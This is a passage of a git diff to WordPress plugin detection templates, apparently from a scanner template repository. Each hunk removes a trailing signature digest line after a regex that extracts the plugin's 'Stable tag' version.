'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa2f51f6abd3a92c48d3ddb414552f6cbed90a40e12a9c7825c297de386097a7022100ad3b6efb65077530566190abab491a224b7a1e8dbd21eac1a33244a0b7ed6616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 9cc015b2a3..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013e545d611cf8417a8f41a8f78b17a52adf343565083c2683f688843d36319dc022100910e143ff1c036090c70ee87bb429c39b227a248c6cba6c9528016e01e212441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 29597faa66..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3981099764cff9602451136c49fb4a5ba9a7523a3a0e69d7e2b611226e0e6fd0220313b577fea806575919aedefc5d5e5fce5e557a1ec1a0786c9ac85722ef6a182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 635b8a1ded..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210080b99e0dbbce395139a88a483f8e8ccb4ce10624022aacc37641a668730b9c3f022100d09ededcd00cfb14bdc266d8867ed3cad4e1c1edaf4e1964b8b5352d9981dbc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 686d678dd9..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eff0a17421ffe99cd4096d7dc65d6b6d67abb79c5ece88908d74b6b7a4e3543d02201531c4daaa8b66a6a7da8af9943199c2fb37a491433c112f4b6650a7e68fbbc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 14e51fadcc..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022026e1ad82dd2e0defebe60137e81d5cfa2010bb0fab801de30f83e16b58dfcd4602210086e10172338a2cf4709953d3c51c7511b1a682b20e1b24223628afdf695adac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 22beb2b1ff..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f12c4026812d79307a4f0ca5029181cca8ef59ba2742d3ed61990aa7cbcb4bd20221008a779226712f2ea1b94b86571f4cddca6b2980c7ef2027e494b45a4eb98c2626:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f35e611d06..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207045d1efe45e92d4a18095273872df7d6e778f5e1f2d5e999dbfef2aa419f189022100a35b44b83324395b4e06e9e26c8fd5da0ac2913474f13b925d222c5c09a34775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index f34ba38188..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db2915045834fef51537f8969add7afbf67ccf4078173df1d4179d585db7d28302204b1ee8a7432f5c21b2bcf2b1afe8d8202379cc6d310d2390b80ef383d424e6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 91da1963c5..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b08a50225fc0df98b1dee2d6c5fd09c4e5547f1e79fe3f200c2c38dd3b9a005b022100ca8d1107742b8b3024b7aeba890667c23c8f30561027257314d0cd6604653227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 76834ec4b1..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d07ce1a6bc0ff429e97e82268f12e5a579cff9d84d4cc3c6312e610cb58e9626022100aab75008b6ccf59c9041e6d5cd7c0cf246b1a970dac31bdae307b768edcf6134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 2c56cca33c..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206db37182fc9b02f29dfd5681cfca2ff0637d8a1d4dd0e56513eedb0304a4f745022041807d32e73a654b0c7e9fe31fb3109c1d17ca4642765786495475380b23b3c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 2d9f0c2f96..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057ef5e7be4402f03e1a195732332ec2804ea117192b049f2144e203d771208880220791392153ff9894df490bc8a639b132d803808a338a010f01514da4fbe66905a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 027724690f..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a0045304302207f0468932db54f7f38108321071c5173acccdc3e57714155b3271bad148d7b1c021f36a66ab27b0286022a6401bb04f688cfea0e8b374ac210b761161b319858b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index bbaa8270f2..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008cf100b8857097427d55b4966e2a31009edeb72133237b52ae05118bc762ac4b022070078803bd9864bf36f323fc9a8d69e3cecc7c550d247b70664159f70a96a8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 2340014014..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e2c741240415b4aa64c602b57e0356dcaa10f727b42b8a9acb5c5273bfe98c9022100bd295a8c9c24926bbe0f692730562648e2d7c647ccbfeb8e0b0e79bc588ce357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 0d45b9aee4..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd235b79515e8025c4bdb0cc23fe196e1807610fd12ad99f29611f1299d44ff602210084a9c7ca18c4143da4f4b71502bbf4a953592974f7756c66a491fd4b4a28a7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 48346eda1a..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c6a6cf7b3dc7ac5ad2a1e838f0ba48c948b372e3c1637e87cd9b89de9d0198302205e8801469298410d5478f064e5faf9f0ef7c0dd72515ad78b99b138eddb746c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 617d02c4c5..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e045149674e95c6eeb73e5ef1de1ee7831ff4bb3d5c39e544b6514b304b29fd022100ed0f17899e7c9e80ca5393a1bc8d4b070979337e1221ae67af24a1c9106abe15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 9e44e93245..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdcc219c1c3f15469aa319768e15152907c72c45085430b43a13a823dfb9e810022100c10b3e76ff645f27e3db856965be9cc2af616e37202fc6bb3b55499eeabf78b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index d34b30d612..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d0c0a574af81da0aeff9617fe5055059343e9abdc7e71d647f67513c41103bc702207ecc6bc7c1b86f9d091573593e0e4e9c81b9117c35e3dc8a7b36610a87b0ca26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 92bea5dbb8..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b29636b39279b4d6a6b488aa0b1823938ac07ead53e5b2553bd43368545fcdec022100980e8ae3fd1b1ffea5ffe604da967ac66220cc26dbff3b54c3c283ee9c130bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 9d71ad66a4..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d351ecdf0288b837c956ae4cb1226ec807393bad3e1fe5bc4cd5c626f084b87022100eb7711105f4d840472eb1d2654e74c128d7243852e3264249524d98de54a3f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 3ab68d99e1..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be02d8da8fa350e781fd9fa0c34e98c68a85a5b93fabc3c695e4e9e248e3d40b022100af508ddcc7586d3f3f72b8e87cd47979ea60ea85f05c904b79144ad208554f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 8a4096d8e2..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6da803363bc2fd8da65190e7488c51e5bb4923baa3ba0396a01f29998699706022100b158575a084c048d83c564493a8a8adf3912e3e3b86da334303508c2ef229a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ecf5cdd571..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe3a0a3a556252315e20c6cacea8b6d1f1eca2b5d25f848eed9aa712457d12b5022100abdcf5b6b5b85648c7f535ad49ea9676f0e9d3941fafd69fa873bcd95ebb3f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a395abea79..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b70d911d88b4d4f3424f85ce7cc6f4ee8f753c6fd06ba33c18240917fc70c09022100e051dc57e981a7aafb24d16952cc8e473bde8e5053682d66f17afeef8f9c24ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index a831431abb..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201bee6cb3de199ddbb8f5ab9d5d528c257aca496ff68a0a7b8eec46ecf90c122002210096043b7908fb89e968db747fdfc7607c3a17eccc14312bbbe1d8c7dd17e369a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 0423bdb09e..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c6cdf9a3a98d5d8c0620933c19c3a8589c3a2da2742140cb6ab78fd752b66e9022100d530f05d4e44a323f8ac7f4953dc92f64a32fc886d4e298af49976b12397e1a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 4450dcdd1f..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8904e9d8d3e4de44564718ba3a4be180335d0ea1da66ba3040fff16d481bbc202205ea9c39f7756da0732bbbd63c2d00cb6b5a69c8180b2f9746fbf660936b43b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 23260f51b1..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204355aea76879dbb2547218136d40ee5a8f416f78ed4ed9f3f3abdfa2cee38b45022049626e18ee01f064566980a34f4a8eba064a65f92ab63ae9b586b94bedaf86f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 57b7dc192c..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5b6c29198f996cabb15915bccf31ca3965b9a1debcd33d5c05054008ee1b782022044cd9306a7873bd86e0af4f7abb08bc74ebd9c428334116e703de1eea3cc79a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 9ce1d1ee82..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012c3edf605f3f61ee10fa8642da8ec1c5b4e3302b693063f56812288f02f6851022064cd00ea5a6f4aa431dfc4b1ae792bc7407dcc9cbb2ef1d3f1b21091db37faa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 1e31205f6e..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220169a7998273d320dfc4eaa449f8b14c6739bad56864a6c4598b03bb5e4721bf80221009085c1e869c143a4b6ef102eebb3107dd52c2d9a3b6b99d08a1fafbc54b67510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index cd89722bfb..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201901912c6cffb4c51e924e8b31e37abffe993d35cffecec968649704768f23e4022100bf3a311bc9bc76fdd08ac699c4bc1d59b3cc857feb2213675aa9ce8ad3be3e25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index c8cf1a90e0..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206078880b24cf182639550a907f5a5b6e3cfec9a355e0ace71fe4ecd6b2a66843022100aed01c76cb49e540f982eb4b0f0594b0b7a5bdd65ec81248fbfae5265ff8ddae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index cdc2b37b5d..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa554f3041abffcb1b466bb8bfb1522f0cf0513638a6ab575dc699bd3a8ca60e02207d5fc707fe8c9a586ca0f60dfb8f5bb4403333b58c00b55bb04cc693b40f6d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 9ddc7a13cb..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201ca33bc25042235020ad90c9701b95cbafa2d850928274e3a60a10757f2a5c1d022049c665db605b00629db0860d90922cf7f313354e16870741b4673a3fe1fb1701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index fd91825aa8..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c97d3d94ea98ded08db9f8efa9c68369ac1f0bb51088aadc181104dd4650986022100bd5680be30f45e204452eb0134c844e16511abba94d1a32ead2a7652c2f28db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index c2fb8e6ef8..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dadcc29eee32e65e4424d93df2fb1f5103bd65bcd90fe6dcab6d27dd0594f80c022078d1c7954190ff4ea05a764146cb29fb70dd6d184c85a06b56a5725c40c017f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index da6ea03d70..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100819e67d902ce182bb6ce0daaef15db31034ea2ec59f1e7c3528bee1d22f3d841022047ab825bc97447e3aaa2d7c60dcb446a8ec907fa0643b6bf51bdeadd979e33ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 581278b421..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017e35e797f5826eba539a9976003baae1b499be6db06dea8ece8f535d0dee781022100ba426e2f895f8d814676794c6cbebc18abf2c6a32297496d8c6595403dbe9203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 0441916880..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206351224511f9b747ac01d13048e8a5fb4e4ff60dbc5e4c10d79b5f29bb2c6762022100dd2029415be8bb0f02719ccf6a0924ad319514f270c43c5e134a3499ef54181b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index a458625cef..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022037771ed0fa3b35c3138333f1b038bed00f2c33ab6d9b9e9e00c74aa23d7c7de4022100a585f85e5166e2df23ff54539aa3bc531241b31b5ce36f44a262f7ca30a000d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 06429830c9..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220392c4b89f97af30a56e305cdfc434d8038773c01234017d6d9a144bdabf61c0a02210083e11bb7271d19bd846cfd73b0216a9068419e3b3bc46eb31e81a0dee74f3aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index de8644e5ed..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204229770c35bb0aedbf5e5e03fbecd6a6348d6b09dc65f62a6f44da3c5f22dce3022100cf2ccb309bc3107b6193cfafc0aa0a10121d514959fbab6520b2b8def7b2acd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 2fed495cbb..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca1cefae0b473e1da4815ad79a39bc792ea3f3fc0ee821d5580bf0ff75d3555d022100ac3316317bc62c58572fca30975b34bfc379b2262643195ba573c8a012719c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 66dfc39a34..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 